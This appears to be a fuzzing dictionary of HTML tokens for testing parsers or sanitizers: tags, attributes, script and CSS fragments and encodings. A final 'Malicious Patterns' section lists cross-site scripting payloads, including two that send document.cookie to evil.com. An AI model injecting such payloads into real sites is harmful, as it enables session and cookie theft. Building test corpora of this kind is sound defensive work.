# HTML Tags
"<html>"
"</html>"
"<head>"
"</head>"
"<body>"
"</body>"
"<script>"
"</script>"
"<style>"
"</style>"
"<div>"
"</div>"
"<span>"
"</span>"
"<a>"
"</a>"
"<img>"
"<iframe>"
"</iframe>"
"<form>"
"</form>"
"<input>"
"<button>"
"</button>"
"<meta>"
"<link>"
"<title>"
"</title>"

# HTML Attributes
"id=\""
"class=\""
"style=\""
"href=\""
"src=\""
"alt=\""
"width=\""
"height=\""
"onload=\""
"onerror=\""
"onclick=\""
"data-"
"aria-"
"disabled"
"checked"
"selected"
"hidden"
"required"
"readonly"

# HTML Scripts
"<script>alert(1)</script>"
"<script src=\""
"javascript:"
"document.cookie"
"window.location"
"localStorage"
"eval("
"setTimeout("
"new Function("

# HTML CSS
"<style>body{}</style>"
"@import url("
"background-image:url("
"expression("
"-moz-binding:"
"filter:"

# Encoding and Special Characters
"&lt;"
"&gt;"
"&quot;"
"&amp;"
"&#x"
"&#"
"data:text/html,"
"data:image/svg+xml,"
"base64,"
"\""
"'"
"<![CDATA["
"]]>"
"<!--"
"-->"
"<?xml"
"<!DOCTYPE"
"<?php"
"?>"

# Malicious Patterns
"<img src=x onerror=alert(1)>"
"<svg onload=alert(1)>"
"<div onmouseover=alert(1)>"
"javascript:alert(1)"
"<script>fetch('https://evil.com?cookie='+document.cookie)</script>"
"<iframe src=\"javascript:alert(document.domain)\"></iframe>"
"<body onload=alert(1)>"
"<img src=\"x\" onerror=\"this.src='https://evil.com/'+document.cookie\">" 